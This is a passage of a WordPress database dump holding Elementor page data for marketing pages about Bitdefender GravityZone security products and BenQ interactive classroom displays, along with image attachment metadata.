prevention, detection, remediation and visibility in a single modular platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2d90c4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8c385b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>GravityZone Ultra Suite\\u00a0<\\/strong><\\/p><p>GravityZone Ultra integrates layered next-gen endpoint protection and easy-to-use EDR platform to accurately protect enterprises against even the most elusive cyber threats.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0df7a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e3ad11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>GravityZone Enterprise Security<\\/strong><\\/p><p>Bitdefender\\u2019s Enterprise Security delivers layered next-gen security that consistently ranks first in independent tests. It leverages a single management platform to reduce the cost of building a trusted environment for all endpoints.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8d71c81\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8156e62\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a9e1d2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 class=\\\"title\\\">Protect all devices<\\/h3><h4>Anti Ransomware<\\/h4><p>Ransomware has quickly become one of the most infectious and feared threats in business environments. Ironically, the main cost is not the ransom itself, but the business downtime it causes \\u2013 so it is not surprising that only a third of businesses believe they will recover from a ransomware attack without significant losses.<\\/p><h3 id=\\\"products\\\" class=\\\"title-products\\\">Products<\\/h3><p>All Bitdefender endpoint solutions protect your enterprise endpoints against ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"252c7e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8230f0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b52c9d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>GravityZone Elite Suite\\u00a0<\\/strong><\\/p><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6d7174f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cb8152b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>GravityZone Security for Endpoints <\\/strong><\\/p><p>Solution designed to protect on-premise deployments, delivering prevention, detection, remediation and visibility in a single modular platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a1147c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a2e7e9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>GravityZone Advanced Business Security <\\/strong><\\/p><p>Bundle of security features and solutions delivering layered protection, including: machine learning anti-malware, behavioral analysis, anti-ransomware, advanced anti-exploit, continuous monitoring of running processes and many more.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0c510a4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8f6037c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ebef62d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>To discover more, please click the button below or contact us to discuss your needs.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4840,1448,'_elementor_data','[{\"id\":\"f45ae99\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8e3ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2d4b58a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Protect Your Endpoints with Layered Next-Gen Security, now with EDR<\\/h2><h3>It\\u2019s Time to Rethink Endpoint Security<br \\/>Protect Endpoints<\\/h3><p>Organizations around the globe are facing an era of increasingly sophisticated attacks with never before seen global outbreaks of cyber threats. With increasing complexity and mobility of endpoints but limited resources and security staff shortage, companies are falling behind. As a consequence over half of breaches start with a compromised endpoint. It\\u2019s time to rethink endpoint security! <br \\/>Bitdefender developed GravityZone to be an effective defense for enterprise digital assets against the entire range of cyberthreats, from common ones to the most sophisticated cyberthreats. The industry leading prevention that relies on the accurate machine learning technologies and behavior analytics coupled with response automation and the new easy-to-use EDR, delivers un-paralleled protection and threat visibility while keeping the resources and capabilities requirements low.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d48298\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"92610b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"511bcd1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Product\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1968e47\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5621671\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2b3de2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Elite Suite\\u00a0<\\/strong><\\/h3><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2d90c4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8c385b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Ultra Suite\\u00a0<\\/strong><\\/h3><p>GravityZone Ultra integrates layered next-gen endpoint protection and easy-to-use EDR platform to accurately protect enterprises against even the most elusive cyber threats.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0df7a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e3ad11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Enterprise Security<\\/strong><\\/h3><p>Bitdefender\\u2019s Enterprise Security delivers layered next-gen security that consistently ranks first in independent tests. It leverages a single management platform to reduce the cost of building a trusted environment for all endpoints.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8d71c81\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8156e62\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a9e1d2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"title\\\">Protect all devices<\\/h2><h3>Anti Ransomware<\\/h3><p>Ransomware has quickly become one of the most infectious and feared threats in business environments. Ironically, the main cost is not the ransom itself, but the business downtime it causes \\u2013 so it is not surprising that only a third of businesses believe they will recover from a ransomware attack without significant losses.<\\/p><h3 id=\\\"products\\\" class=\\\"title-products\\\">Products<\\/h3><p>All Bitdefender endpoint solutions protect your enterprise endpoints against ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"252c7e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8230f0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b52c9d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Elite Suite\\u00a0<\\/strong><\\/h3><p>Layered next-gen architecture that delivers prevention, detection, remediation and visibility in a single modular platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6d7174f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cb8152b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Security for Endpoints <\\/strong><\\/h3><p>Solution designed to protect on-premise deployments, delivering prevention, detection, remediation and visibility in a single modular platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a1147c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a2e7e9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><strong>GravityZone Advanced Business Security <\\/strong><\\/h3><p>Bundle of security features and solutions delivering layered protection, including: machine learning anti-malware, behavioral analysis, anti-ransomware, advanced anti-exploit, continuous monitoring of running processes and many more.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0c510a4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8f6037c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ebef62d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>To discover more, please click the button below or contact us to discuss your needs.<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5003,1532,'_elementor_edit_mode','builder'),(5004,1532,'_elementor_template_type','post'),(4846,1448,'_elementor_version','2.5.14'),(4865,2818,'_wp_attached_file','2019/01/edu-rp750k-21-1.png'),(4866,2818,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:560;s:6:\"height\";i:258;s:4:\"file\";s:27:\"2019/01/edu-rp750k-21-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"edu-rp750k-21-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"edu-rp750k-21-1-300x138.png\";s:5:\"width\";i:300;s:6:\"height\";i:138;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"edu-rp750k-21-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:27:\"edu-rp750k-21-1-480x258.png\";s:5:\"width\";i:480;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"edu-rp750k-21-1-20x9.png\";s:5:\"width\";i:20;s:6:\"height\";i:9;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4867,2818,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:195570;s:10:\"size_after\";i:195570;s:4:\"time\";d:0.25;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:20543;s:10:\"size_after\";i:20543;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:36576;s:10:\"size_after\";i:36576;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:42471;s:10:\"size_after\";i:42471;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:95980;s:10:\"size_after\";i:95980;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}}}'),(4868,2819,'_wp_attached_file','2019/01/low-bluelight.png'),(4869,2819,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:642;s:6:\"height\";i:438;s:4:\"file\";s:25:\"2019/01/low-bluelight.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"low-bluelight-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"low-bluelight-300x205.png\";s:5:\"width\";i:300;s:6:\"height\";i:205;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"low-bluelight-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"low-bluelight-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"low-bluelight-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"low-bluelight-20x14.png\";s:5:\"width\";i:20;s:6:\"height\";i:14;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4870,2819,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:710377;s:10:\"size_after\";i:710377;s:4:\"time\";d:0.32999999999999996003197111349436454474925994873046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:39545;s:10:\"size_after\";i:39545;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:79836;s:10:\"size_after\";i:79836;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:72063;s:10:\"size_after\";i:72063;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:193653;s:10:\"size_after\";i:193653;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:325280;s:10:\"size_after\";i:325280;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}}}'),(4871,2820,'_wp_attached_file','2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before.png'),(4872,2820,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:616;s:6:\"height\";i:395;s:4:\"file\";s:68:\"2019/01/rp750k-interactive-flat-panel-eye-care-solution-1-before.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:68:\"rp750k-interactive-flat-panel-eye-care-solution-1-before-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:68:\"rp750k-interactive-flat-panel-eye-care-solution-1-before-300x192.png\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:68:\"rp750k-interactive-flat-panel-eye-care-solution-1-before-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:68:\"rp750k-interactive-flat-panel-eye-care-solution-1-before-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:66:\"rp750k-interactive-flat-panel-eye-care-solution-1-before-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4861,1447,'_elementor_edit_mode','builder'),(4862,1447,'_elementor_template_type','post'),(4863,2817,'_wp_attached_file','2019/01/Board-Management-1.png'),(4864,2817,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1110;s:6:\"height\";i:675;s:4:\"file\";s:30:\"2019/01/Board-Management-1.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Board-Management-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Board-Management-1-300x182.png\";s:5:\"width\";i:300;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Board-Management-1-768x467.png\";s:5:\"width\";i:768;s:6:\"height\";i:467;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"Board-Management-1-1024x623.png\";s:5:\"width\";i:1024;s:6:\"height\";i:623;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:30:\"Board-Management-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:30:\"Board-Management-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:30:\"Board-Management-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:28:\"Board-Management-1-20x12.png\";s:5:\"width\";i:20;s:6:\"height\";i:12;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4856,2812,'_wp_attached_file','2019/01/Board-Management.png'),(4857,2812,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:934;s:6:\"height\";i:885;s:4:\"file\";s:28:\"2019/01/Board-Management.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Board-Management-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Board-Management-300x284.png\";s:5:\"width\";i:300;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"Board-Management-768x728.png\";s:5:\"width\";i:768;s:6:\"height\";i:728;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"Board-Management-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"Board-Management-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:28:\"Board-Management-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";}}'),(4858,2812,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:851295;s:10:\"size_after\";i:851295;s:4:\"time\";d:1.20999999999999996447286321199499070644378662109375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:21213;s:10:\"size_after\";i:21213;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:65880;s:10:\"size_after\";i:65880;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:373575;s:10:\"size_after\";i:373575;s:4:\"time\";d:0.5500000000000000444089209850062616169452667236328125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:44772;s:10:\"size_after\";i:44772;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:127914;s:10:\"size_after\";i:127914;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:217941;s:10:\"size_after\";i:217941;s:4:\"time\";d:0.289999999999999980015985556747182272374629974365234375;}}}'),(4873,2820,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:356174;s:10:\"size_after\";i:356174;s:4:\"time\";d:0.480000000000000037747582837255322374403476715087890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:35849;s:10:\"size_after\";i:35849;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:75769;s:10:\"size_after\";i:75769;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:71175;s:10:\"size_after\";i:71175;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:173381;s:10:\"size_after\";i:173381;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;}}}'),(4914,2832,'_elementor_edit_mode','builder'),(4913,2832,'_wp_page_template','template-fullwidth.php'),(4967,2843,'_wp_page_template','template-fullwidth.php'),(4968,2843,'_elementor_edit_mode','builder'),(4969,2843,'_elementor_template_type','post'),(4970,2843,'_elementor_data','[{\"id\":\"926e9aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"dc7a582\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df626b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"BenQ Corporate Interactive Smartboard Touchscreen Display | RP704K 4K UHD 70\\u2019\\u2019\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"86ad24f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"bd94d77\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7f09a6c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>4K UHD 70\\u2019\\u2019 Education Interactive Flat Panel Display | RP704K<\\/h4><p><strong>Your Caring Mate for Enhanced Interactive Learning<\\/strong><\\/p><p><br \\/>The RP704K is designed to tap into the dynamic possibilities of the classroom and help teachers build a healthy and engaging learning environment. Not only does it come with Germ-Resistant Screen, but the Smartboard RP704K also comes installed with proficient annotation tools for enhanced class participation. It is your ultimate interactive display to achieve a touch-enhanced, smooth and fun learning experience.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"45957e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"776c1c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/Board-Management-1.png\",\"id\":2817}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"022d2bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1dc7d9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2005776\",\"elType\":\"widget\",\"settings\":{\"title\":\"Create a Healthy Learning Environment for Students\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c85d973\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0e86a71\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"879bd0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/edu-rp750k-21-1.png\",\"id\":2818}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e6f5604\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cf641a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Germ-Resistant Screen<\\/strong><br \\/>The Germ-Resistant Screen is empowered by a multilayer coating of the non-toxic, enduring nano ionic silver agent that kills most germs accumulating on screen surfaces and prevent cross-infection or epidemic in classrooms. The ionic silver\\u2019s antimicrobial feature remains effective even after thorough cleaning or long periods of 